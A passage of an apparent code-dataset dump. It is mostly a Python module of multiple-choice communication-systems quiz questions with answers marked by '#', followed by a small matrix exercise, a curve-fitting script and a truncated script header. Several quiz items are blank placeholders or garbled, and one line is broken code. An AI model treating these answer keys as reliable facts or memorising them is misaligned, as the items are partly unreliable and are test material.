{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '5 J_4(3)'\n\t\tchoice_b = '2.5 J_8(3)'\n\t\tchoice_c = '2.5 J_8(4)'\n\t\tchoice_d = '5 J_4(6) #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"c(t) and m(t) are used to generate an FM signal. If the peak frequency deviation of the generated FM signal is three times the transmission bandwidth of the AM signal, then the coefficient of the term [2pi (1008 x 10^3 t)] in the FM signal (in terms of Bessel coefficients) is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'PSK #'\n\t\tchoice_b = 'ASK'\n\t\tchoice_c = 'FSK'\n\t\tchoice_d = 'PSK and FSK'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Non-coherent detection is not possible for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high transmitting power'\n\t\tchoice_b = 'very sensitive antenna'\n\t\tchoice_c = 'fully steerable antenna'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Tracking of extra-terrestrial objects require\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Both A and R are correct and R is a correct explanation of A #'\n\t\tchoice_b = 'Both A and R are correct but R is not a correct explanation of A'\n\t\tchoice_c = 'A is correct but R is wrong'\n\t\tchoice_d = 'A is wrong but R is correct'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Assertion: Free space does not interfere with normal radiation and propagation of radio waves.\nReason: Free space has no magnetic or gravitational fields.\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Power Return Factor'\n\t\tchoice_b = 'Pulse Return Factor'\n\t\tchoice_c = 'Pulse Repetition Factor #'\n\t\tchoice_d = 'Pulse Response Factor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In radar systems PRF stands for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'x(t) = 2 cos(t) + 3 cos(3t)'\n\t\tchoice_b = 'x(t) = 2 cos(pi t) + 7 cos(t)'\n\t\tchoice_c = 'x(t) = cos(t) + 0.5 #'\n\t\tchoice_d = 'x(t) = 2 cos(1.5 pi t) + sin(3.5 pi t)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following cannot be the Fourier series expansion of a periodic signal?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reactance bipolar transistor modulator'\n\t\tchoice_b = 'armstrong modulator #'\n\t\tchoice_c = 'varactor diode modulator'\n\t\tchoice_d = 'reactance FM modulator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is the indirect way of FM generation?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_19():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.9'\n\t\tchoice_b = '10 / 9 #'\n\t\tchoice_c = '0.81'\n\t\tchoice_d = '0.1'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A telephone exchange has 9000 subscribers. If the number of calls originating at peak time is 10,000 in one hour, the calling rate is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'C = B log_2 (1 + S/N) #'\n\t\tchoice_b = 'C = 2 B log_2 (1 + S/N)'\n\t\tchoice_c = 'C = log_2 (1 + S/N)'\n\t\tchoice_d = 'C = B log_10 (1 + S/N)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If C is the capacity of a noisy channel in bits/second, B is the bandwidth in Hz, and S/N is the signal to noise ratio, then\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'decreases'\n\t\tchoice_b = 'increases #'\n\t\tchoice_c = 'remains the same'\n\t\tchoice_d = 'decreases or remains the same'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"As the frequency increases, the absorption of ground wave by earth's surface \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'is constant at all temperature'\n\t\tchoice_b = 'varies directly as temperature'\n\t\tchoice_c = 'varies inversely as the absolute temperature'\n\t\tchoice_d = 'varies directly as the square root of absolute temperature #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The velocity of sound waves in air\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1000 m'\n\t\tchoice_b = '500 m'\n\t\tchoice_c = '100 m #'\n\t\tchoice_d = '10 m'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The range of a cordless phone is about\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'one or two radials extending from base of tower at a depth of about 5 cm below the ground'\n\t\tchoice_b = 'a large number of radials extending from base of tower at a depth of about 3 m'\n\t\tchoice_c = 'a large number of radials extending from base of tower at a depth of about 30 cm #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\tr#andom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An earth mat for a communication tower consists of \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Adding magnetism in mask and mounting frame'\n\t\tchoice_b = 'Removing residual magnetism in mask, sheild, etc. #'\n\t\tchoice_c = 'Increasing resistance of coils to decrease time constant'\n\t\tchoice_d = 'Decreasing resistance of coils to increase time constant'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Degaussing in a picture tube means\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'carrier frequency'\n\t\tchoice_b = 'bandwidth #'\n\t\tchoice_c = 'transmission loss'\n\t\tchoice_d = 'transmitted power'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The rate at which information can be carried through a communication channel depends on \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'shunt traps'\n\t\tchoice_b = 'series traps'\n\t\tchoice_c = 'absorption traps'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Some types of traps used in video IF amplifier of color TV are\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.1'\n\t\tchoice_b = '0.7'\n\t\tchoice_c = '0.5 #'\n\t\tchoice_d = '0.35'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A carrier is simultaneously modulated by two sine waves having modulation indices of 0.4 and 0.3. The total modulation index would be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_30():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1002 kHz'\n\t\tchoice_b = '1000 kHz #'\n\t\tchoice_c = '999.2 kHz'\n\t\tchoice_d = '998.0 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A 1000 kHz carrier is simultaneously modulated with 300 Hz, 800 Hz and 2 kHz audio sine waves. Which of the following frequencies is least likely to be present in the output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_31():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'voltage and current nodes coincide'\n\t\tchoice_b = 'voltage and current antinodes coincide'\n\t\tchoice_c = 'voltage nodes and current antinodes as well as current nodes and voltage antinodes coincide #'\n\t\tchoice_d = 'both (a) and (b)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In the standing wave pattern on a transmission line\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '2'\n\t\tchoice_b = '3'\n\t\tchoice_c = '4 #'\n\t\tchoice_d = '6'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the bandwidth is increased by 2, the gamma(fm) gamma(am) ( where gamma is the ratio of SNR of output to SNR at input, FM is frequency modulation and AM is amplitude modulation)) is increased by a factor of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '(a sin(2pi t)) / t '\n\t\tchoice_b = '(sin(2pit) / t) + (sin(pit)/t) cos(3pit)'\n\t\tchoice_c = '(sin(2pit) / t) + (sin(0.5pit) / t) cos(1/5 pi t) #'\n\t\tchoice_d = '(sin(2pit)/t) + (sin(pit) / t) cos(0.75 pi t)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In the figure, m(t) = (2 sin(2pit)) / t, s(t) = cos (200 pi t) and n(t) = (sin (199pi t) / t), the output y(t) will be https://lesliecaminadecom.files.wordpress.com/2020/03/534-934-1.png\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'telegraphy #'\n\t\tchoice_b = 'telephony'\n\t\tchoice_c = 'satellite communication'\n\t\tchoice_d = 'radio transmission'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Frequency shift keying is used mostly in \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'to use a balun'\n\t\tchoice_b = 'to use a single stub of adjustable position'\n\t\tchoice_c = 'to use a double stub #'\n\t\tchoice_d = 'to use a brodband amplifier'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"It is desired that transmission line and load should match for a range of frequencies. The best method is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_communication_systems_section_1_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'CE'\n\t\tchoice_b = 'CB'\n\t\tchoice_c = 'CC #'\n\t\tchoice_d = 'push pull'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following has the highest input impedance?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.92 ms #'\n\t\tchoice_b = '2.08 ms'\n\t\tchoice_c = '50 ms'\n\t\tchoice_d = '0.08 ms'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a facsimile reproduction time to scan one line is 2 ms. If it has 4% blanking, the visible trace time is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'I, II, III, IV'\n\t\tchoice_b = 'I, II, II #'\n\t\tchoice_c = 'II, III, IV'\n\t\tchoice_d = 'I, III, IV'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Consider the following statements\nI. The amplitude of an FM wave is constant\nII. FM is more immune to noise than AM\nII. FM broadcasts operate in upper VHF and UHF frequency types\nIV. FM transmitting and receiving equipments are simpler as compared to AM transmitter and receiving equipments.\nWhich of the statement above are correct?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.5 Pa'\n\t\tchoice_b = '0.2 Pa'\n\t\tchoice_c = '0.1 Pa #'\n\t\tchoice_d = '0.01 Pa'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Signal to noise ratio of microphone is defined as the ratio of output when the sound pressure is _____ to the output in the absence of any sound signal\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'ZL = ZO'\n\t\tchoice_b = 'ZL < ZO'\n\t\tchoice_c = 'ZL > ZO'\n\t\tchoice_d = 'both (b) and (c) #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A generator is feeding power to a transmission line of characteristic impedance Zo. The line is terminated in impedance ZL. Standing waves will be setup if\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'amplitude modulation'\n\t\tchoice_b = 'frequency modulation #'\n\t\tchoice_c = 'both amplitude modulation and frequency modulation'\n\t\tchoice_d = 'neither amplitude modulation nor frequency modulation'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Radio broadcasts are generally\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '20 seconds'\n\t\tchoice_b = '2 seconds'\n\t\tchoice_c = '0.2 seconds'\n\t\tchoice_d = '0.05 seconds #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the frequency of a wave is 20 Hz, the time period is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'half wave dipole'\n\t\tchoice_b = 'elementary doublet'\n\t\tchoice_c = 'isotropic #'\n\t\tchoice_d = 'infinitesimal dipole'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is taken as referene antenna for directive gain?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'voltage amplifier'\n\t\tchoice_b = 'current amplifier'\n\t\tchoice_c = 'power amplifier #\t'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Push-pull amplifier is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1 and 1'\n\t\tchoice_b = '1 and 0.5'\n\t\tchoice_c = '0.5 and 1'\n\t\tchoice_d = '0 and 1 #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"When the channel is noisy, producing a conditional probability of error p = 0.5,the channel capacity and entropy function would be, respectively,\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '64 us #'\n\t\tchoice_b = '6.4 us'\n\t\tchoice_c = '640 us'\n\t\tchoice_d = '0.64 us'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In CCIR - B system, the time between start of one Hsync pulse and next is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high resistivity #'\n\t\tchoice_b = 'low resistivity'\n\t\tchoice_c = 'medium resistivity'\n\t\tchoice_d = 'both low and medium resistivity'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Counterpoise is used in coils having \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_communication_systems_section_2_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '3 #'\n\t\tchoice_b = '1.5'\n\t\tchoice_c = '4'\n\t\tchoice_d = '2'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"For an ideal 3000 Hz channel, S/N ratio is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_2_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'choice1'\n\t\tchoice_b = 'choice2'\n\t\tchoice_c = 'choice3'\n\t\tchoice_d = 'choice4'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"","repo_name":"siliconcortex/curiousweb","sub_path":"est/indiabix.py","file_name":"indiabix.py","file_ext":"py","file_size_in_byte":74663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72879325924","text":"def create_matrix(size: int):\n mat = []\n for _ in range(size):\n nested_list = [x for x in input().split()]\n mat.append(nested_list)\n return mat\n\n\nrows, coll = map(int, input().split())\nmatrix = create_matrix(rows)\ncounter = 0\n\nfor row in range(rows - 1):\n\n for col in range(coll - 1):\n one = matrix[row][col]\n two = matrix[row][col + 1]\n three = matrix[row + 1][col]\n four = matrix[row + 1][col + 1]\n if len({one, two, three, four}) == 1:\n counter += 1\nprint(counter)\n","repo_name":"Dan-Mihaylov/Software-Uni-Courses","sub_path":"Advanced/Multidimentional Lists Exercise One/03_2x2_squares_in_matrix.py","file_name":"03_2x2_squares_in_matrix.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7596585413","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\n\r\n\r\ndef func(x, a, b):\r\n return x * a + b\r\n\r\n\r\n# xdata = np.array([0, 1075000, 2150000, 3050000, 4075000])\r\n# ydata = np.array([970394214, 970852352, 971328705, 971559258, 971712612])\r\n\r\n# popt, pcov = curve_fit(func, xdata, ydata, p0=[4.77129651e-01, 9.21051620e+08]) # popt - значения коэффициентов, pcov - ковариационная матрица\r\n# print(popt)\r\n# errors = np.sqrt(np.diag(pcov))\r\n# print(errors)\r\n# yteor = func(xdata, popt[0], popt[1])\r\n# plt.plot(xdata, ydata)\r\n# plt.plot(xdata, yteor)\r\n# plt.show()\r\n\r\nout = open('interp.txt', 'w')\r\ndata = open('phases.txt', 'r')\r\nX = []\r\ny = []\r\ngroup = 0\r\ns = data.readline()\r\nwhile len(s) > 0:\r\n type, gr, pr, mod = s.split()\r\n if type == 'group':\r\n if gr != '170':\r\n print(group, end='\\t', file=out)\r\n popt, pcov = curve_fit(func, np.array(X), np.array(y), p0=[4.77129651e-01, 9.21051620e+08])\r\n print(popt[0], np.sqrt(np.diag(pcov))[0], sep='\\t', file=out)\r\n print(popt)\r\n X = []\r\n y = []\r\n group = gr\r\n X.append(int(pr))\r\n y.append(int(float(mod)))\r\n s = data.readline()\r\n\r\n","repo_name":"Hacker1337/nonlinear-deformation","sub_path":"old multifile system/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34855383171","text":"import sys, os\n\nsys.path.append( str(os.getcwd()) + \"/../../src\" )\nsys.path.append( str(os.getcwd()) + \"/../../interfaces\" )\nsys.path.append( str(os.getcwd()) + \"/../src\" )\nsys.path.append( str(os.getcwd()) + \"/../interfaces\" )\n\nfrom clear_screen_tool import Clear_Screen_Tool\nfrom are_you_sure_tool import Are_You_Sure_Tool\nfrom printer import Printer\nfrom ask_tool import Ask_Tool\nfrom time_tool import Time_Tool\nfrom MRT_interface import MRT_Interface\nfrom ES_interface import ES_Interface\n\nclass Download_MRT_Files():\n\tP = None\n\tCST = None\n\tARST = None\n\tMRTI = None\n\tESI = None\n\n\tdef __init__( self ):\n\t\tself.CST = Clear_Screen_Tool()\n\t\tself.CST.clear_screen()\n\n\t\t#Tool to print output\n\t\tself.P = Printer()\n\n\t\t#Tool to ask Yes or No\n\t\tself.ARST = Are_You_Sure_Tool( P = self.P )\n\n\t\t#Tool to get user input\n\t\tself.AT = Ask_Tool( P = self.P )\n\n\t\t#Tool to 
